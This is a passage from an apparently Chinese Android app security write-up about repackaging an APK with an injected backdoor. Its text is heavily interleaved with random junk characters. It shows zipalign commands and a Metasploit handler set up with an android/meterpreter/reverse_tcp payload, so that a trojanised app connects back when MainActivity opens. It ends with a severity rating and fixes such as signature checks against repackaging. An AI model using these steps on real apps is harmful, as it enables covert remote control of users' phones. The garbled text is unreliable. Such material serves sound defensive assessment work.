( e+ I7 z4 o d, r7 G* ]1 e& F4 b- V/ x, @6 y6 D0 |2 f 字节对齐优化 - V [5 P0 X& m9 ?& q- C. D9 r' ]1 C; N* C. F2 n

$ }6 y! W. Y) c. |$ X& O+ B I6 D9 }8 E8 J& }/ y0 U5 ?4 E zipalign -v 4 repackaged.apk final.apk . Y/ u# G" ^8 f! v9 c% g; v) `5 W0 R $ p6 K+ P; Y+ C

& i$ I: N0 B8 C( s! B' u * j% [* [% \$ _ B3 t 检查是否对齐 % r9 v- C0 }/ F* A7 w- V6 `9 ?! n5 ~+ p7 p8 E

: J+ S6 z" ?! A " W8 s! }" x$ h+ L& L4 z5 J/ ? zipalign -c -v 4 final.apk % P2 a6 Y9 n& k3 l2 r: G- y9 G `" w! P6 H$ Z

) x$ v8 F8 M/ H9 X( T2 x5 S4 m$ x* G9 S' A$ \ 注：zipalign可以在V1签名后执行，但zipalign不能在V2签名后执行,只能在V2签名之前执行 0 {* D! M) f' L 0 F/ r& s% N" ^7 m

. G) H8 I' s9 r! [7 ~- Z4 u8 J0 n8 J n$ y( k2 e+ n( }7 r 启动Metasploit控制台，配置参数等待上线 " E2 T4 h& o3 m+ N 0 x- E: K5 Q. _8 Z& c

3 [+ y: H- i6 N2 U9 o7 ^ 4 U( W8 `! s: g) Z) _ 在终端依次输入如下命令 / {4 b l# e9 u % w1 G. F8 U* J+ L- p

7 I9 }1 Y1 e3 s4 u- y# q2 \9 q) A , C& x; a O3 m$ g msfconsole # X4 s0 A/ _7 Z% l! p( ?4 x3 L+ J$ \2 ^$ w0 x& J% k: L

2 g/ ~. m0 ~/ J8 l0 ]7 H4 P - c. ]; Y6 y. r7 P use exploit/multi/handler 8 T6 q# U! P3 n6 x, v, N0 M: k- {# f' s

3 n3 o6 s) Q! u- G ( T2 a, W9 y# ~2 d! m/ D2 ?3 c. s' ? set PAYLOAD android/meterpreter/reverse_tcp $ c g% [! \, p0 h" O) f1 c$ I

2 l+ b4 @. J3 B0 d0 [( K8 _$ b6 I ) @4 C" I3 U. k' P' Q- M! _* C2 j1 \. f set LHOST 192.xxx.xx.xx * @# T; n! L! u% ^* M+ v7 |7 s. o2 N' x% u9 j. u

5 O! O# C) ^2 F( Z ! o; z$ ^8 {6 w set LPORT 4444 ' n( Q$ ]8 A: w Y' d5 R; @( l7 e( t) ]) i

+ E2 c3 i0 v$ W3 k 7 l' S% J' l" ?5 j- f% Z: S/ G exploit $ U( A) I, J. ]1 j: f ?* A1 J' H" p7 m- g- z/ N

6 R/ U: n2 Z3 `$ H5 I4 q2 } , N: c% L( _3 b 之前我们把入口放在 MainActivity 的 onCreate 方法中，当启动目标应用进入该界面，就会连接成功，如下图： ! A5 x# ^. m" B 3 X1 z6 l$ C: U- ^

$ |# V: R: @/ ~* h : M: n5 C6 z6 ~6 L" n7 w. e0 N7 g# s 漏洞危害：中 3 R9 B; f; b* o( t+ `! @# y! _ 4 h2 b5 c! p) N/ s; n, r

2 V7 ?- j) {$ s" _/ T . @5 i. L2 q1 A- F7 N * a/ ?; H- s6 D/ F$ X+ W ' ^" T" \|' c% L- K, V i5 {. W 严重程度 8 M/ j6 }# \# j# m! H E 6 r" q* Z5 Y( k1 l- M0 C. J% z 0 r4 t' g- r3 P5 g7 l3 m- Y v) F4 }( @9 K# O; U	6 ?: p1 S+ q, K- ~. v. g5 t6 C2 O1 R! ? ( }1 P- m$ \|3 k2 v1 q( L# c9 I. ]4 ^0 B$ { 高 % t$ T9 k( \3 L8 b3 F- y 1 W/ ]. [. \8 E3 I; \|; }0 D# M1 b* X : b: q& p5 R9 G% z, O3 y6 G* \|0 L& \|$ N' c* u	* p O6 J$ {& b7 {% v w7 u! Y6 \% B9 }# S: j7 ^ ( {/ H- N& _" ~/ M; B$ _3 ^0 ?8 K6 q. \|) r, ]1 H ■ 0 v4 Z% \|1 m. s, @ w0 R2 J3 d : r2 S1 n7 T6 B+ ~7 q C* { ' p# c8 s9 h: S3 s. u9 j( ?# W+ h 1 Y8 @" F* h' b. H2 a9 ^. u	. x+ B% L8 X3 V+ c& s, R) B- Y) C& Q' C$ U3 K/ H& a 6 g4 U: h, O# g2 k5 b- a! ~9 k! q0 k6 M# m 中 3 d0 J& a/ d1 X% J) n - c' u7 ^) h. m- @0 Z % X \. w- A T( S2 z5 a, c# r z9 f( V6 v! q	8 }$ m* Z( j2 W7 A/ l4 e3 Y) [7 m; n! Q1 k9 {. U - @* p2 F. s, {: f( q0 D" F: T( j/ B4 P : y0 E0 e" {6 O: z s 3 I. B/ B5 \' x! f; {+ Q3 L$ r 5 E# p+ F( V' g2 @ \|9 c9 ~+ @% I ; I# J. m$ t" T 8 S+ J" f* \& C" g, [# H; b4 ~; L* f7 ?1 T	6 v# e0 A7 x2 M) e2 D* M9 A! A4 X5 P' W) p% T/ L% Z " R) T& ^' ^4 M8 G A/ A6 ~0 z8 x$ I+ F9 Y' \|; \1 W! T$ D: W2 C 低 3 G4 x2 Y* ]7 Z8 ^7 Z v" z$ w2 m: w2 v Z# e. o- n / m. K# o1 N- w" E 3 z( c% O# z N	5 X/ ~( N; m! Y$ O6 E* P' y6 @! g: r# l % g9 t. C) Q* t, ^( g4 K& D2 Q" Z2 ~# h4 F# N$ ? " g; {4 }8 n' U Q4 s$ [; a% L u' s! [& n; E 6 y; @7 q' Q, F* O6 \| * j1 c7 q$ g( p' X . d. j6 D$ u; L# H9 G7 {6 \|% h 3 l& n; c5 @% Z

" M. X; X3 z! F! G/ L/ s ) J; Q8 a' |; T8 _ z+ k/ w 7 W3 S) e0 o9 n) X1 ? . ~! p! a, d O" o" Z

' Y) B' B2 \/ e5 ]& c9 b- z! l+ s3 O7 V 修复方法： / O% V4 N! a2 @. T1 Z 6 r5 W8 B& d1 v7 X& n3 }

1 N0 J( l+ A# Q3 C1 x' E / T# J9 y6 @) a' S 1.在 APP 启动时应做签名校验防止二次打包。
$ r* y# q8 S1 i' ^ T% C" Y ; ], K" r+ c! w: V! z' @ 2.建议采用客户端、通信和服务器端联动防御方案进行安全防御。 ; j9 h8 C# A) Q# B - ?# z1 C9 [2 E* P* z5 }

3 e; D+ l7 x9 L& S / d' \2 Z. k* g4 U8 a' J# X 6 V. O4 K8 L- C g& _ ) c) v+ o$ V# l6 K" ?& T7 H

, s# V( G5 ?5 d9 T+ p/ } ) U9 ~8 F# s9 t$ J
4 U2 C- K' \+ z 4 N+ |2 E) F! S) x

		自动登录	找回密码
密码			立即注册